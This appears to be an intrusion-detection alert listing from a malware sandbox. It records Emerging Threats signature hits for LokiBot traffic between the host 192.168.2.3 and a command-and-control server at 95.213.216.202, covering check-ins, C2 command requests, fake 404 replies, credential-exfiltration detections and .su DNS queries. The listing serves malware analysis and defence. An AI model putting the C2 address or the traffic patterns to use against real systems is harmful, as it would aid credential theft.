                                192.168.2.395.213.216.20249731802021641 11/30/22-00:55:10.632751TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973180192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249752802021641 11/30/22-00:55:49.378987TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249703802021641 11/30/22-00:54:16.960834TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970380192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249712802024313 11/30/22-00:54:35.972913TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971280192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249727802825766 11/30/22-00:55:03.486766TCP2825766ETPRO TROJAN LokiBot Checkin M24972780192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249717802025381 11/30/22-00:54:45.540558TCP2025381ET TROJAN LokiBot Checkin4971780192.168.2.395.213.216.202
                                192.168.2.38.8.8.859581532014169 11/30/22-00:55:17.784201UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5958153192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249712802024318 11/30/22-00:54:35.972913TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971280192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497312025483 11/30/22-00:55:12.166821TCP2025483ET TROJAN LokiBot Fake 404 Response804973195.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249739802024313 11/30/22-00:55:25.267085TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973980192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249725802025381 11/30/22-00:54:59.930841TCP2025381ET TROJAN LokiBot Checkin4972580192.168.2.395.213.216.202
                                192.168.2.38.8.8.849166532014169 11/30/22-00:55:40.126118UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related4916653192.168.2.38.8.8.8
                                192.168.2.38.8.8.860749532014169 11/30/22-00:54:58.103973UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6074953192.168.2.38.8.8.8
                                95.213.216.202192.168.2.380497052025483 11/30/22-00:54:21.783216TCP2025483ET TROJAN LokiBot Fake 404 Response804970595.213.216.202192.168.2.3
                                192.168.2.38.8.8.853975532014169 11/30/22-00:54:22.160619UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5397553192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249753802025381 11/30/22-00:55:51.242717TCP2025381ET TROJAN LokiBot Checkin4975380192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249757802021641 11/30/22-00:55:58.948901TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249716802021641 11/30/22-00:54:43.829219TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971680192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249739802024318 11/30/22-00:55:25.267085TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973980192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249741802825766 11/30/22-00:55:29.247109TCP2825766ETPRO TROJAN LokiBot Checkin M24974180192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249700802825766 11/30/22-00:54:09.487691TCP2825766ETPRO TROJAN LokiBot Checkin M24970080192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249720802024313 11/30/22-00:54:51.608521TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972080192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249708802024318 11/30/22-00:54:26.803652TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970880192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497482025483 11/30/22-00:55:43.661913TCP2025483ET TROJAN LokiBot Fake 404 Response804974895.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249731802825766 11/30/22-00:55:10.632751TCP2825766ETPRO TROJAN LokiBot Checkin M24973180192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249702802024313 11/30/22-00:54:14.871390TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970280192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249720802024318 11/30/22-00:54:51.608521TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972080192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249737802825766 11/30/22-00:55:21.614296TCP2825766ETPRO TROJAN LokiBot Checkin M24973780192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249702802024318 11/30/22-00:54:14.871390TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970280192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249719802825766 11/30/22-00:54:49.641508TCP2825766ETPRO TROJAN LokiBot Checkin M24971980192.168.2.395.213.216.202
                                192.168.2.38.8.8.863446532014169 11/30/22-00:55:43.898414UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6344653192.168.2.38.8.8.8
                                95.213.216.202192.168.2.380497092025483 11/30/22-00:54:30.691043TCP2025483ET TROJAN LokiBot Fake 404 Response804970995.213.216.202192.168.2.3
                                95.213.216.202192.168.2.380497432025483 11/30/22-00:55:34.122250TCP2025483ET TROJAN LokiBot Fake 404 Response804974395.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249708802024313 11/30/22-00:54:26.803652TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970880192.168.2.395.213.216.202
                                192.168.2.38.8.8.858119532014169 11/30/22-00:55:38.197046UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5811953192.168.2.38.8.8.8
                                192.168.2.38.8.8.857990532014169 11/30/22-00:54:11.706174UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5799053192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249759802024318 11/30/22-00:56:01.042444TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975980192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249709802825766 11/30/22-00:54:29.164231TCP2825766ETPRO TROJAN LokiBot Checkin M24970980192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249730802024313 11/30/22-00:55:08.823725TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973080192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249745802025381 11/30/22-00:55:36.377571TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249724802021641 11/30/22-00:54:58.184483TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972480192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249759802024313 11/30/22-00:56:01.042444TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249703802825766 11/30/22-00:54:16.960834TCP2825766ETPRO TROJAN LokiBot Checkin M24970380192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249704802025381 11/30/22-00:54:18.966132TCP2025381ET TROJAN LokiBot Checkin4970480192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497152025483 11/30/22-00:54:43.541337TCP2025483ET TROJAN LokiBot Fake 404 Response804971595.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249730802024318 11/30/22-00:55:08.823725TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973080192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249718802024318 11/30/22-00:54:47.592007TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971880192.168.2.395.213.216.202
                                192.168.2.38.8.8.864121532014169 11/30/22-00:55:57.444180UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6412153192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249719802021641 11/30/22-00:54:49.641508TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971980192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249721802825766 11/30/22-00:54:53.572062TCP2825766ETPRO TROJAN LokiBot Checkin M24972180192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497042025483 11/30/22-00:54:19.714505TCP2025483ET TROJAN LokiBot Fake 404 Response804970495.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249747802021641 11/30/22-00:55:40.214633TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.395.213.216.202
                                192.168.2.38.8.8.849874532014169 11/30/22-00:55:45.675021UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related4987453192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249722802025381 11/30/22-00:54:54.732179TCP2025381ET TROJAN LokiBot Checkin4972280192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249718802024313 11/30/22-00:54:47.592007TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971880192.168.2.395.213.216.202
                                192.168.2.38.8.8.853428532014169 11/30/22-00:55:25.189214UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5342853192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249736802024318 11/30/22-00:55:19.643476TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973680192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249736802024313 11/30/22-00:55:19.643476TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973680192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249732802025381 11/30/22-00:55:12.457821TCP2025381ET TROJAN LokiBot Checkin4973280192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497592025483 11/30/22-00:56:01.793951TCP2025483ET TROJAN LokiBot Fake 404 Response804975995.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249746802024318 11/30/22-00:55:38.275174TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974680192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249749802024318 11/30/22-00:55:43.976237TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974980192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249737802021641 11/30/22-00:55:21.614296TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973780192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249746802024313 11/30/22-00:55:38.275174TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497542025483 11/30/22-00:55:55.161061TCP2025483ET TROJAN LokiBot Fake 404 Response804975495.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249735802025381 11/30/22-00:55:17.863854TCP2025381ET TROJAN LokiBot Checkin4973580192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249706802021641 11/30/22-00:54:22.484255TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970680192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249734802021641 11/30/22-00:55:16.065951TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973480192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249699802825766 11/30/22-00:54:07.324934TCP2825766ETPRO TROJAN LokiBot Checkin M24969980192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497322025483 11/30/22-00:55:13.950022TCP2025483ET TROJAN LokiBot Fake 404 Response804973295.213.216.202192.168.2.3
                                95.213.216.202192.168.2.380497372025483 11/30/22-00:55:23.147009TCP2025483ET TROJAN LokiBot Fake 404 Response804973795.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249749802024313 11/30/22-00:55:43.976237TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249748802025381 11/30/22-00:55:42.098367TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497212025483 11/30/22-00:54:54.418787TCP2025483ET TROJAN LokiBot Fake 404 Response804972195.213.216.202192.168.2.3
                                95.213.216.202192.168.2.380497102025483 11/30/22-00:54:33.459515TCP2025483ET TROJAN LokiBot Fake 404 Response804971095.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249733802024313 11/30/22-00:55:14.244291TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973380192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249707802025381 11/30/22-00:54:24.716724TCP2025381ET TROJAN LokiBot Checkin4970780192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249733802024318 11/30/22-00:55:14.244291TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973380192.168.2.395.213.216.202
                                192.168.2.38.8.8.851139532014169 11/30/22-00:54:24.370686UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5113953192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249721802021641 11/30/22-00:54:53.572062TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972180192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249747802825766 11/30/22-00:55:40.214633TCP2825766ETPRO TROJAN LokiBot Checkin M24974780192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249706802825766 11/30/22-00:54:22.484255TCP2825766ETPRO TROJAN LokiBot Checkin M24970680192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249709802021641 11/30/22-00:54:29.164231TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970980192.168.2.395.213.216.202
                                192.168.2.38.8.8.855638532014169 11/30/22-00:54:39.891168UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5563853192.168.2.38.8.8.8
                                192.168.2.38.8.8.853466532014169 11/30/22-00:55:06.970990UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5346653192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249717802021641 11/30/22-00:54:45.540558TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971780192.168.2.395.213.216.202
                                192.168.2.38.8.8.864823532014169 11/30/22-00:55:34.318234UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6482353192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249706802025381 11/30/22-00:54:22.484255TCP2025381ET TROJAN LokiBot Checkin4970680192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249716802825766 11/30/22-00:54:43.829219TCP2825766ETPRO TROJAN LokiBot Checkin M24971680192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249720802021641 11/30/22-00:54:51.608521TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972080192.168.2.395.213.216.202
                                192.168.2.38.8.8.865017532014169 11/30/22-00:55:05.186135UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6501753192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249734802025381 11/30/22-00:55:16.065951TCP2025381ET TROJAN LokiBot Checkin4973480192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249723802024318 11/30/22-00:54:56.463103TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972380192.168.2.395.213.216.202
                                192.168.2.38.8.8.864602532014169 11/30/22-00:55:53.393350UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6460253192.168.2.38.8.8.8
                                95.213.216.202192.168.2.380497252025483 11/30/22-00:55:01.390776TCP2025483ET TROJAN LokiBot Fake 404 Response804972595.213.216.202192.168.2.3
                                95.213.216.202192.168.2.380497292025483 11/30/22-00:55:08.539654TCP2025483ET TROJAN LokiBot Fake 404 Response804972995.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249723802024313 11/30/22-00:54:56.463103TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972380192.168.2.395.213.216.202
                                192.168.2.38.8.8.853848532014169 11/30/22-00:54:49.539403UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5384853192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249744802825766 11/30/22-00:55:34.401351TCP2825766ETPRO TROJAN LokiBot Checkin M24974480192.168.2.395.213.216.202
                                192.168.2.38.8.8.865107532014169 11/30/22-00:54:47.470066UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6510753192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249739802025381 11/30/22-00:55:25.267085TCP2025381ET TROJAN LokiBot Checkin4973980192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249712802021641 11/30/22-00:54:35.972913TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971280192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249753802021641 11/30/22-00:55:51.242717TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975380192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249725802021641 11/30/22-00:54:59.930841TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972580192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249748802024318 11/30/22-00:55:42.098367TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974880192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249731802024313 11/30/22-00:55:10.632751TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973180192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249748802024313 11/30/22-00:55:42.098367TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.395.213.216.202
                                192.168.2.38.8.8.865196532014169 11/30/22-00:55:14.166464UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6519653192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249731802024318 11/30/22-00:55:10.632751TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973180192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249708802825766 11/30/22-00:54:26.803652TCP2825766ETPRO TROJAN LokiBot Checkin M24970880192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249749802825766 11/30/22-00:55:43.976237TCP2825766ETPRO TROJAN LokiBot Checkin M24974980192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249743802024313 11/30/22-00:55:32.962709TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974380192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249757802825766 11/30/22-00:55:58.948901TCP2825766ETPRO TROJAN LokiBot Checkin M24975780192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249743802024318 11/30/22-00:55:32.962709TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974380192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249728802024318 11/30/22-00:55:05.285201TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972880192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249750802025381 11/30/22-00:55:45.758418TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249700802021641 11/30/22-00:54:09.487691TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970080192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249728802024313 11/30/22-00:55:05.285201TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972880192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249714802025381 11/30/22-00:54:39.977728TCP2025381ET TROJAN LokiBot Checkin4971480192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249724802825766 11/30/22-00:54:58.184483TCP2825766ETPRO TROJAN LokiBot Checkin M24972480192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249719802025381 11/30/22-00:54:49.641508TCP2025381ET TROJAN LokiBot Checkin4971980192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249756802024318 11/30/22-00:55:57.533680TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975680192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249742802025381 11/30/22-00:55:31.101064TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249733802021641 11/30/22-00:55:14.244291TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973380192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249729802825766 11/30/22-00:55:07.068054TCP2825766ETPRO TROJAN LokiBot Checkin M24972980192.168.2.395.213.216.202
                                192.168.2.38.8.8.857704532014169 11/30/22-00:54:41.979608UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5770453192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249715802024318 11/30/22-00:54:42.060768TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971580192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249752802825766 11/30/22-00:55:49.378987TCP2825766ETPRO TROJAN LokiBot Checkin M24975280192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249756802024313 11/30/22-00:55:57.533680TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249715802024313 11/30/22-00:54:42.060768TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971580192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249751802024313 11/30/22-00:55:47.279515TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249711802825766 11/30/22-00:54:33.859062TCP2825766ETPRO TROJAN LokiBot Checkin M24971180192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249751802024318 11/30/22-00:55:47.279515TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975180192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249710802024318 11/30/22-00:54:31.910937TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971080192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249710802024313 11/30/22-00:54:31.910937TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971080192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249747802025381 11/30/22-00:55:40.214633TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249701802025381 11/30/22-00:54:12.581436TCP2025381ET TROJAN LokiBot Checkin4970180192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249755802025381 11/30/22-00:55:55.653974TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249729802021641 11/30/22-00:55:07.068054TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972980192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497442025483 11/30/22-00:55:36.086250TCP2025483ET TROJAN LokiBot Fake 404 Response804974495.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249735802024318 11/30/22-00:55:17.863854TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973580192.168.2.395.213.216.202
                                192.168.2.38.8.8.853049532014169 11/30/22-00:55:19.563471UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5304953192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249735802024313 11/30/22-00:55:17.863854TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973580192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249744802024313 11/30/22-00:55:34.401351TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497472025483 11/30/22-00:55:41.771804TCP2025483ET TROJAN LokiBot Fake 404 Response804974795.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249744802024318 11/30/22-00:55:34.401351TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974480192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249741802021641 11/30/22-00:55:29.247109TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974180192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249704802825766 11/30/22-00:54:18.966132TCP2825766ETPRO TROJAN LokiBot Checkin M24970480192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249746802025381 11/30/22-00:55:38.275174TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249732802021641 11/30/22-00:55:12.457821TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973280192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249699802024312 11/30/22-00:54:07.324934TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14969980192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249707802024313 11/30/22-00:54:24.716724TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970780192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497062025483 11/30/22-00:54:24.053489TCP2025483ET TROJAN LokiBot Fake 404 Response804970695.213.216.202192.168.2.3
                                95.213.216.202192.168.2.380497502025483 11/30/22-00:55:46.963833TCP2025483ET TROJAN LokiBot Fake 404 Response804975095.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249699802024317 11/30/22-00:54:07.324934TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24969980192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249727802025381 11/30/22-00:55:03.486766TCP2025381ET TROJAN LokiBot Checkin4972780192.168.2.395.213.216.202
                                192.168.2.38.8.8.865511532014169 11/30/22-00:55:27.103034UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6551153192.168.2.38.8.8.8
                                192.168.2.38.8.8.864967532014169 11/30/22-00:55:58.869049UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6496753192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249721802025381 11/30/22-00:54:53.572062TCP2025381ET TROJAN LokiBot Checkin4972180192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249707802024318 11/30/22-00:54:24.716724TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970780192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249713802021641 11/30/22-00:54:37.979213TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971380192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249732802825766 11/30/22-00:55:12.457821TCP2825766ETPRO TROJAN LokiBot Checkin M24973280192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249751802825766 11/30/22-00:55:47.279515TCP2825766ETPRO TROJAN LokiBot Checkin M24975180192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497552025483 11/30/22-00:55:57.270722TCP2025483ET TROJAN LokiBot Fake 404 Response804975595.213.216.202192.168.2.3
                                95.213.216.202192.168.2.380497582025483 11/30/22-00:56:00.797031TCP2025483ET TROJAN LokiBot Fake 404 Response804975895.213.216.202192.168.2.3
                                95.213.216.202192.168.2.380497362025483 11/30/22-00:55:21.118367TCP2025483ET TROJAN LokiBot Fake 404 Response804973695.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249703802024318 11/30/22-00:54:16.960834TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970380192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249702802025381 11/30/22-00:54:14.871390TCP2025381ET TROJAN LokiBot Checkin4970280192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249703802024313 11/30/22-00:54:16.960834TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970380192.168.2.395.213.216.202
                                192.168.2.38.8.8.857134532014169 11/30/22-00:54:31.820802UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5713453192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249758802021641 11/30/22-00:56:00.034214TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.395.213.216.202
                                192.168.2.38.8.8.858691532014169 11/30/22-00:54:53.455722UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5869153192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249736802825766 11/30/22-00:55:19.643476TCP2825766ETPRO TROJAN LokiBot Checkin M24973680192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249705802025381 11/30/22-00:54:20.168790TCP2025381ET TROJAN LokiBot Checkin4970580192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497332025483 11/30/22-00:55:15.751744TCP2025483ET TROJAN LokiBot Fake 404 Response804973395.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249745802825766 11/30/22-00:55:36.377571TCP2825766ETPRO TROJAN LokiBot Checkin M24974580192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497032025483 11/30/22-00:54:18.541620TCP2025483ET TROJAN LokiBot Fake 404 Response804970395.213.216.202192.168.2.3
                                95.213.216.202192.168.2.380497142025483 11/30/22-00:54:41.602416TCP2025483ET TROJAN LokiBot Fake 404 Response804971495.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249716802024313 11/30/22-00:54:43.829219TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971680192.168.2.395.213.216.202
                                192.168.2.38.8.8.859433532014169 11/30/22-00:54:56.376062UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5943353192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249757802024313 11/30/22-00:55:58.948901TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249717802825766 11/30/22-00:54:45.540558TCP2825766ETPRO TROJAN LokiBot Checkin M24971780192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249722802024313 11/30/22-00:54:54.732179TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972280192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249716802024318 11/30/22-00:54:43.829219TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971680192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249759802025381 11/30/22-00:56:01.042444TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.395.213.216.202
